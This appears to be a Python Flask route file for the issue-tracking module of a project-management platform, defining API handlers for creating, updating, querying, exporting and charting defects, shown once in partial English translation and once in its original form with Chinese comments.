ret = IssueBusiness.status_switch(issue_id, handle_status)
return json_detail_render(ret)
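# Illustrative only: from a client, flipping an issue to a new handling status
# might look like this (URL and status value are assumptions):
#
#   import requests
#   requests.post("http://localhost:5000/v1/issue/handlestatus/398",
#                 json={"handle_status": 2})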
# Switch issue assignee
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
"""
    @api {post} /v1/issue/handler/{int:id} Switch issue assignee
    @apiName ModifyIssueSwitch
    @apiGroup Project
    @apiDescription Switch the assignee of an issue
@apiParamExample {json} Request-Example:
{
"handler": 11
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handler = parse_json_form('handler_switch')
ret = IssueBusiness.handler_switch(issue_id, handler)
return json_detail_render(ret)
# Switch issue severity level
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
"""
    @api {post} /v1/issue/level/{int:id} Switch issue severity level
    @apiName ModifyIssueLevel
    @apiGroup Project
    @apiDescription Switch the severity level of an issue
@apiParamExample {json} Request-Example:
{
"level": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
level = parse_json_form('level_switch')
ret = IssueBusiness.level_switch(issue_id, level)
return json_detail_render(ret)
# Switch issue priority
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
"""
    @api {post} /v1/issue/priority/{int:id} Switch issue priority
    @apiName ModifyIssuePriority
    @apiGroup Project
    @apiDescription Switch the priority of an issue
@apiParamExample {json} Request-Example:
{
"priority": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
priority = parse_json_form('priority_switch')
ret = IssueBusiness.priority_switch(issue_id, priority)
return json_detail_render(ret)
# Update the issue comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
"""
    @api {post} /v1/issue/comment/{int:id} Update issue comment
    @apiName ModifyIssueComment
    @apiGroup Project
    @apiDescription Update the comment on an issue
@apiParamExample {json} Request-Example:
{
"comment": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
comment = parse_json_form('add_comment')
ret = IssueBusiness.add_comment(issue_id, comment)
return json_detail_render(ret)
# Query issues by projectid and versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
"""
    @api {get} /v1/issue/ Query the issue list
    @apiName SearchIssue
    @apiGroup Project
    @apiDescription Query the issue list
    @apiParam {int} [projectid] project ID
    @apiParam {int} [versionid] version ID
    @apiParam {string} [creator_id] creator IDs, separated by ','
    @apiParam {string} [handler_id] assignee IDs, separated by ','
    @apiParam {int} [title] title
    @apiParam {string} [handle_status] handling status IDs, separated by ','
    @apiParam {string} [module_id] module IDs, separated by ','
    @apiParam {string} [priority] priority IDs, separated by ','
    @apiParam {int} [page_size] page size for pagination
    @apiParam {int} [page_index] page index for pagination
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"creator_id": "1,2,3,4",
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 2,
"comment": "",
"creation_time": "2019-08-08 20:58:49",
"creator": [
{
"id": 96,
"name": "张宇"
}
],
"description": "",
"detection_chance": "",
"handle_status": 2,
"handler": [
{
"id": 96,
"name": "张宇"
}
],
"issue_number": "T398",
"issue_type": 1,
"issueid": 398,
"level": 1,
"modified_time": "2019-08-08 20:58:49",
"modifier": [],
"module": [
{
"id": 329,
"name": "用例二级2222"
}
],
"priority": 1,
"project_id": 4,
"rank": 12,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": "",
"test_time": "",
"title": "1.2.7issuse55555",
"version": [
{
"id": 173,
"name": "1.2.7"
}
],
"weight": ""
}
],
"message": "ok",
"page_index": 1,
"page_size": 1,
"total": 8
}
"""
requirement_id = request.args.get('requirement_id')
if requirement_id:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index, requirement_id)
return json_list_render2(0, data, page_size, page_index, count)
else:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data(page_size, page_index)
return json_list_render2(0, data, page_size, page_index, count)
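# Illustrative only: the list endpoint above is driven by query parameters, so
# a filtered, paginated request might look like this (all values are assumptions):
#
#   import requests
#   requests.get("http://localhost:5000/v1/issue/",
#                params={"projectid": 4, "versionid": 173,
#                        "handle_status": "1,2", "page_size": 10, "page_index": 1})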
# Query issue history records
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
"""
    @api {get} /v1/issue/record Query the issue history record list
    @apiName GetIssueRecordList
    @apiGroup Project
    @apiDescription Query the issue history record list
    @apiParam {int} projectid project ID
    @apiParam {int} versionid version ID
@apiParamExample {json} Request-Example:
?projectid=1
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 0,
"comment": "",
"creation_time": "2019-05-10 16:23:28",
"creator": [
{
"id": 12,
"name": "刘焕焕"
}
],
"description": "<p>分享微信不成功.</p>",
"detection_chance": 0,
"handle_status": 1,
"handler": [
{
"id": 12,
"name": "刘焕焕"
}
],
"issue_number": "T309",
"issue_type": 0,
"issueid": 309,
"level": 1,
"modified_time": "2019-05-13 13:02:45",
"modifier": [],
"module": [
{
"id": 291,
"name": "V2.4.9版本用例飞科"
}
],
"priority": 1,
"project_id": 1,
"rank": 20,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": 1,
"test_time": "",
"title": "分享微信不成功",
"version": [
{
"id": 128,
"name": "V2.4.9"
}
],
"weight": ""
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_all_json()
return json_detail_render(0, data)
# Query issue history record details
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
"""
    @api {get} /v1/issue/record/detail/{int:issue_id} Query issue history record details
    @apiName GetIssueRecordDetailById
    @apiGroup Project
    @apiDescription Query issue history record details
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_record_detail(issue_id)
return json_detail_render(0, data)
# Query an issue by id
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
"""
    @api {get} /v1/issue/{int:issue_id} Query issue details (by id)
    @apiName GetIssueById
    @apiGroup Project
    @apiDescription Query issue details by ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"attach":"attach",
"chance":1,
"comment":"",
"creation_time":"2018-12-18 20:28:39",
"creator":[
{
"id":1,
"name":"王金龙"
}
],
"description":"description",
"handle_status":3,
"handler":[
{
"id":1,
"name":"王金龙"
}
],
"issue_number":"T1",
"issue_type":1,
"issueid":1,
"level":1,
"modified_time":"2019-03-01 16:46:10",
"modifier":[
{
"id":1,
"name":"王金龙"
}
],
"module":[
{
"id":1,
"name":"音频"
}
],
"priority":1,
"project_id":1,
"reopen":0,
"repair_time":"0:00:05",
"requirement_id":"",
"requirement_title":"",
"stage":1,
"status":0,
"system":0,
"test_time":"2 days, 20:21:05",
"title":"title",
"version":[
{
"id":1,
"name":"str"
}
],
"weight":""
}
],
"message":"ok"
}
"""
data = IssueBusiness.query_by_id(issue_id)
return json_detail_render(0, data)
# Dashboard of issue open/close counts
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
return json_detail_render(0, data)
# Query the number of issues created per day by each tester
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
return json_detail_render(0, data)
# Issue status distribution and priority distribution
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
"""
    @api {POST} /v1/issue/dashboard/project Query issue status and priority distribution
    @apiName GetIssueByStatusAndPriority
    @apiGroup Project
    @apiDescription Query the status distribution and priority distribution of issues
@apiParamExample {json} Request-Example:
{
"start_date": "2019-01-02 10:10:11",
"end_date": "2019-01-03 10:10:12",
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date)
return json_detail_render(0, data)
# Board: query the number of issues in each status by pro_id
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
"""
    @api {post} /v1/issue/dashboard/project/{int:project_id} Query board issues by project ID
    @apiName GetBoardIssueByProjectId
    @apiGroup Project
    @apiDescription Query board issues by project ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"info":[
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":2
},
{
"count":1,
"handle_status":3
}
],
"total":3,
"version":1
},
{
"detail":[
{
"count":1,
"handle_status":4
}
],
"total":1,
"version":2
},
{
"detail":[
{
"count":1,
"handle_status":1
}
],
"total":1,
"version":3
},
{
"detail":[
{
"count":3,
"handle_status":4
}
],
"total":3,
"version":4
},
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":4
}
],
"total":2,
"version":128
}
],
"project_id":1
}
],
"message":"ok"
}
"""
data = IssueDashBoardBusiness.issue_project_id_dashboard(pro_id)
return json_detail_render(0, data)
# Bind an issue to a requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
"""
    @api {post} /v1/issue/bind/requirement Bind an issue to a requirement
    @apiName IssueBindRequirement
    @apiGroup Project
    @apiDescription Bind an issue to a requirement
    @apiParam {int} issue_id issue ID
    @apiParam {int} requirement_id requirement ID
@apiParamExample {json} Request-Example:
{
"issue": 11,
"requirement_id": 22
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
requirement_id, issue_id = parse_json_form('issue_bind_requirement')
ret, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
return json_detail_render(ret, [], msg)
# Export the issue list
@issue.route('/export', methods=['GET'])
def issue_export():
"""
    @api {get} /v1/issue/export Export issues to xls
    @apiName IssueExportToXls
    @apiGroup Project
    @apiDescription Export the issue list to an xls file
    @apiParam {int} [projectid] project ID
    @apiParam {int} [versionid] version ID
    @apiParam {int} [creator_id] creator ID
    @apiParam {int} [title] title
    @apiParam {int} [handle_status] handling status ID
    @apiParam {int} [module_id] module ID
    @apiParam {int} [priority] priority ID
    @apiParam {int} [page_size] page size for pagination
    @apiParam {int} [page_index] page index for pagination
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls",
"message": "ok"
}
"""
issue_url = IssueBusiness.export()
return json_detail_render(code=0, data=issue_url)
| from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# 新增issue
@issue.route('/', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_create')
def issue_add_handler():
"""
@api {post} /v1/issue 新增 缺陷
@apiName CreateIssue
@apiGroup 项目
@apiDescription 新增 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 123,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, creator, modifier, handler,
issue_type, chance, level, priority, stage,title, attach, handle_status,
description, comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_create')
ret = IssueBusiness.create(system, version, project_id, module_id, creator, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_modify')
def issue_modify_handler(issue_id):
"""
@api {post} /v1/issue/{int:id} 修改 缺陷
@apiName ModifyIssue
@apiGroup 项目
@apiDescription 修改 缺陷
@apiParam {int} module_id 模块 ID
@apiParam {int} handler 处理人 ID
@apiParam {int} issue_type 类型
@apiParam {int} chance 出现几率
@apiParam {int} level 级别
@apiParam {int} priority 优先级
@apiParam {int} system 系统
@apiParam {string} title 标题
@apiParam {string} attach 福建
@apiParam {string} description 描述
@apiParam {int} detection_chance 用户识别度
@apiParam {int} project_id 项目 ID
@apiParam {int} version 版本
@apiParam {int} creator 创建人 ID
@apiParam {int} modifier 修改人 ID
@apiParam {int} [requirement_id] 关联的 需求 ID
@apiParam {string} [tag] 标签
@apiParamExample {json} Request-Example:
{
"module_id": 340,
"handler": 93,
"issue_type": 0,
"chance": 0,
"level": 0,
"priority": 0,
"system": 4,
"title": "123",
"attach": "{\"images\":[],\"files\":[],\"videos\":[]}",
"description": "<p>test</p>",
"detection_chance": 0,
"project_id": 4,
"version": 168,
"creator": 93,
"modifier": 93,
"requirement_id": 1,
"tag": 13,14
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
(system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description,
comment, detection_chance, requirement_id, case_covered, tag) = parse_json_form('issue_modify')
ret = IssueBusiness.modify(issue_id, system, version, project_id, module_id, modifier, handler, issue_type,
chance, level, priority, stage, title, attach, handle_status, description, comment,
detection_chance, requirement_id, case_covered, tag)
return json_detail_render(ret)
# 根据id修改,删除issue
@issue.route('/<int:issue_id>', methods=['DELETE'])
def issue_delete_handler(issue_id):
"""
@api {delete} /v1/issue/{int:id} 删除 缺陷
@apiName DeleteIssue
@apiGroup 项目
@apiDescription 删除 缺陷
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
ret = IssueBusiness.delete(issue_id)
return json_detail_render(ret)
# 切换issue状态
@issue.route('/handlestatus/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:handle_status')
def issue_board_status_handler(issue_id):
"""
@api {post} /v1/issue/handlestatus/{int:id} 切换 缺陷状态
@apiName ModifyIssueStatus
@apiGroup 项目
@apiDescription 切换 缺陷状态
@apiParamExample {json} Request-Example:
{
"handle_status": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handle_status = parse_json_form('handle_status')[0]
ret = IssueBusiness.status_switch(issue_id, handle_status)
return json_detail_render(ret)
# 切换issue处理人
@issue.route('/handler/<int:issue_id>', methods=['POST'])
@validation('POST:handler_switch')
@required(modify_permission)
def issue_handler_switch_handler(issue_id):
"""
@api {post} /v1/issue/handler/{int:id} 切换 缺陷处理人
@apiName ModifyIssueSwitch
@apiGroup 项目
@apiDescription 切换 缺陷处理人
@apiParamExample {json} Request-Example:
{
"handler": 11
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
handler = parse_json_form('handler_switch')
ret = IssueBusiness.handler_switch(issue_id, handler)
return json_detail_render(ret)
# 切换issue等级
@issue.route('/level/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:level_switch')
def issue_level_switch_handler(issue_id):
"""
@api {post} /v1/issue/level/{int:id} 切换 缺陷等级
@apiName ModifyIssueLevel
@apiGroup 项目
@apiDescription 切换 缺陷等级
@apiParamExample {json} Request-Example:
{
"level": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
level = parse_json_form('level_switch')
ret = IssueBusiness.level_switch(issue_id, level)
return json_detail_render(ret)
# 切换issue优先级
@issue.route('/priority/<int:issue_id>', methods=['POST'])
@required(modify_permission)
@validation('POST:priority_switch')
def issue_priority_switch_handler(issue_id):
"""
@api {post} /v1/issue/priority/{int:id} 切换 缺陷优先级
@apiName ModifyIssuePriority
@apiGroup 项目
@apiDescription 切换 缺陷优先级
@apiParamExample {json} Request-Example:
{
"priority": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
priority = parse_json_form('priority_switch')
ret = IssueBusiness.priority_switch(issue_id, priority)
return json_detail_render(ret)
# 修改issue的comment
@issue.route('/comment/<int:issue_id>', methods=['POST'])
@validation('POST:add_comment')
@required(modify_permission)
def issue_add_comment_handler(issue_id):
"""
@api {post} /v1/issue/comment/{int:id} 切换 缺陷备注
@apiName ModifyIssueComment
@apiGroup 项目
@apiDescription 切换 缺陷备注
@apiParamExample {json} Request-Example:
{
"comment": 3
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
comment = parse_json_form('add_comment')
ret = IssueBusiness.add_comment(issue_id, comment)
return json_detail_render(ret)
# 查询issue-projectid,versionid
@issue.route('/', methods=['GET'])
def issue_query_all_handler():
"""
@api {get} /v1/issue/ 查询 issue 列表
@apiName SearchIssue
@apiGroup 项目
@apiDescription 查询 issue 列表
@apiParam {int} [projectid] 项目 ID
@apiParam {int} [versionid] 版本 ID
@apiParam {string} [creator_id] 创建人 ID,使用 ',' 分割
@apiParam {string} [handler_id] 处理人 ID,使用 ',' 分割
@apiParam {int} [title] 标题
@apiParam {string} [handle_status] 处理状态 ID,使用 ',' 分割
@apiParam {string} [module_id] 模块 ID,使用 ',' 分割
@apiParam {string} [priority] 优先级 ID,使用 ',' 分割
@apiParam {int} [page_size] 分页 页面大小
@apiparam {int} [page_index] 分页 页数
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"creator_id": "1,2,3,4",
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 2,
"comment": "",
"creation_time": "2019-08-08 20:58:49",
"creator": [
{
"id": 96,
"name": "张宇"
}
],
"description": "",
"detection_chance": "",
"handle_status": 2,
"handler": [
{
"id": 96,
"name": "张宇"
}
],
"issue_number": "T398",
"issue_type": 1,
"issueid": 398,
"level": 1,
"modified_time": "2019-08-08 20:58:49",
"modifier": [],
"module": [
{
"id": 329,
"name": "用例二级2222"
}
],
"priority": 1,
"project_id": 4,
"rank": 12,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": "",
"test_time": "",
"title": "1.2.7issuse55555",
"version": [
{
"id": 173,
"name": "1.2.7"
}
],
"weight": ""
}
],
"message": "ok",
"page_index": 1,
"page_size": 1,
"total": 8
}
"""
requirement_id = request.args.get('requirement_id')
if requirement_id:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data_by_rid(page_size, page_index, requirement_id)
return json_list_render2(0, data, page_size, page_index, count)
else:
page_size, page_index = parse_list_args2()
data, count = IssueBusiness.paginate_data(page_size, page_index)
return json_list_render2(0, data, page_size, page_index, count)
# 查询issue历史记录
@issue.route('/record', methods=['GET'])
def issue_record_query_all_handler():
"""
@api {get} /v1/issue/record 查询 缺陷历史记录列表
@apiName GetIssueRecordList
@apiGroup 项目
@apiDescription 查询 缺陷历史记录列表
@apiParam {int} projectid 项目 ID
@apiParam {int} versionid 版本 ID
@apiParamExample {json} Request-Example:
?projectid=1
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"attach": "{"images":[],"files":[],"videos":[]}",
"chance": 0,
"comment": "",
"creation_time": "2019-05-10 16:23:28",
"creator": [
{
"id": 12,
"name": "刘焕焕"
}
],
"description": "<p>分享微信不成功.</p>",
"detection_chance": 0,
"handle_status": 1,
"handler": [
{
"id": 12,
"name": "刘焕焕"
}
],
"issue_number": "T309",
"issue_type": 0,
"issueid": 309,
"level": 1,
"modified_time": "2019-05-13 13:02:45",
"modifier": [],
"module": [
{
"id": 291,
"name": "V2.4.9版本用例飞科"
}
],
"priority": 1,
"project_id": 1,
"rank": 20,
"reopen": 0,
"repair_time": "",
"requirement_id": "",
"requirement_title": "",
"stage": "",
"status": 0,
"system": 1,
"test_time": "",
"title": "分享微信不成功",
"version": [
{
"id": 128,
"name": "V2.4.9"
}
],
"weight": ""
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_all_json()
return json_detail_render(0, data)
# 查询issue历史记录详情
@issue.route('/record/detail/<int:issue_id>', methods=['GET'])
def issue_record_detail_handler(issue_id):
"""
@api {get} /v1/issue/record/detail/{int:issue_id} 查询 缺陷历史记录详情
@apiName GetIssueRecordDetailById
@apiGroup 项目
@apiDescription 查询 缺陷历史记录详情
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
data = IssueRecordBusiness.query_record_detail(issue_id)
return json_detail_render(0, data)
# 根据id查询issue
@issue.route('/<int:issue_id>', methods=['GET'])
def issue_query_handler(issue_id):
"""
@api {get} /v1/issue/{int:issue_id} 查询 缺陷详情 (id)
@apiName GetIssueById
@apiGroup 项目
@apiDescription 查询 缺陷详情 通过 ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"attach":"attach",
"chance":1,
"comment":"",
"creation_time":"2018-12-18 20:28:39",
"creator":[
{
"id":1,
"name":"王金龙"
}
],
"description":"description",
"handle_status":3,
"handler":[
{
"id":1,
"name":"王金龙"
}
],
"issue_number":"T1",
"issue_type":1,
"issueid":1,
"level":1,
"modified_time":"2019-03-01 16:46:10",
"modifier":[
{
"id":1,
"name":"王金龙"
}
],
"module":[
{
"id":1,
"name":"音频"
}
],
"priority":1,
"project_id":1,
"reopen":0,
"repair_time":"0:00:05",
"requirement_id":"",
"requirement_title":"",
"stage":1,
"status":0,
"system":0,
"test_time":"2 days, 20:21:05",
"title":"title",
"version":[
{
"id":1,
"name":"str"
}
],
"weight":""
}
],
"message":"ok"
}
"""
data = IssueBusiness.query_by_id(issue_id)
return json_detail_render(0, data)
# issue关闭和打开的dashboard
@issue.route('/dashboard', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_dashboard_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_dashboard(start_date, end_date)
return json_detail_render(0, data)
# 查询测试人员每天创建的issue个数
@issue.route('/dashboard/tester', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def tester_issue_work_handler():
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_all_tester_dashboard(start_date, end_date)
return json_detail_render(0, data)
# issue的状态分布和优先级分布
@issue.route('/dashboard/project', methods=['POST'])
@required(view_permission)
@validation('POST:issue_dashboard')
def issue_project_dashboard_handler():
"""
@api {POST} /v1/issue/dashboard/project Query defect status and priority distribution
@apiName GetIssueByStatusAndPriority
@apiGroup Project
@apiDescription Query defect status and priority distribution
@apiParamExample {json} Request-Example:
{
"start_date": "2019-01-02 10:10:11",
"end_date": "2019-01-03 10:10:12",
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [
{
"modified_time": "2018-12-19 14:59:34",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "修改了处理状态 待办 为 处理中"
},
{
"modified_time": "2018-12-18 20:28:39",
"modifier_id": 1,
"modifier_name": "王金龙",
"operation": "创建了BUG title"
}
],
"message": "ok"
}
"""
start_date, end_date = parse_json_form('issue_dashboard')
data = IssueDashBoardBusiness.issue_project_dashboard(start_date, end_date)
return json_detail_render(0, data)
# Board: count issues in each handle status for a given project id
@issue.route('/dashboard/project/<int:pro_id>', methods=['GET'])
def issue_query_pro_handler(pro_id):
"""
@api {get} /v1/issue/dashboard/project/{int:project_id} Query board defects by project ID
@apiName GetBoardIssueByProjectId
@apiGroup Project
@apiDescription Query board defects by project ID
@apiParamExample {json} Request-Example:
-
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code":0,
"data":[
{
"info":[
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":2
},
{
"count":1,
"handle_status":3
}
],
"total":3,
"version":1
},
{
"detail":[
{
"count":1,
"handle_status":4
}
],
"total":1,
"version":2
},
{
"detail":[
{
"count":1,
"handle_status":1
}
],
"total":1,
"version":3
},
{
"detail":[
{
"count":3,
"handle_status":4
}
],
"total":3,
"version":4
},
{
"detail":[
{
"count":1,
"handle_status":1
},
{
"count":1,
"handle_status":4
}
],
"total":2,
"version":128
}
],
"project_id":1
}
],
"message":"ok"
}
"""
data = IssueDashBoardBusiness.issue_project_id_dashboard(pro_id)
return json_detail_render(0, data)
# Bind an issue to a requirement
@issue.route('/bind/requirement', methods=['POST'])
@required(modify_permission)
@validation('POST:issue_bind_requirement')
def issue_bind_requirement():
"""
@api {post} /v1/issue/bind/requirement Bind a defect (issue) to a requirement
@apiName IssueBindRequirement
@apiGroup Project
@apiDescription Bind a defect to a requirement
@apiParam {int} issue_id Defect ID
@apiParam {int} requirement_id Requirement ID
@apiParamExample {json} Request-Example:
{
"issue": 11,
"requirement_id": 22
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": [],
"message": "ok"
}
"""
requirement_id, issue_id = parse_json_form('issue_bind_requirement')
ret, msg = IssueBusiness.issue_bind_requirement(issue_id, requirement_id)
return json_detail_render(ret, [], msg)
# Export the issue list
@issue.route('/export', methods=['GET'])
def issue_export():
"""
@api {get} /v1/issue/export Export issues to xls
@apiName IssueExportToXls
@apiGroup Project
@apiDescription Export issues to xls
@apiParam {int} [projectid] Project ID
@apiParam {int} [versionid] Version ID
@apiParam {int} [creator_id] Creator ID
@apiParam {string} [title] Title
@apiParam {int} [handle_status] Handle status ID
@apiParam {int} [module_id] Module ID
@apiParam {int} [priority] Priority ID
@apiParam {int} [page_size] Page size
@apiParam {int} [page_index] Page index
@apiParamExample {json} Request-Example:
{
"projectid": 4,
"versionid": 173,
"page_size": 1
}
@apiSuccessExample {json} Success-Response:
HTTP/1.1 200 OK
{
"code": 0,
"data": "http://tcloud-static.oss-cn-beijing.aliyuncs.com/issue_export/0/Issues-20190809.164431.xls",
"message": "ok"
}
"""
issue_url = IssueBusiness.export()
return json_detail_render(code=0, data=issue_url) | en | 0.223038 | | 2.221668 | 2 |
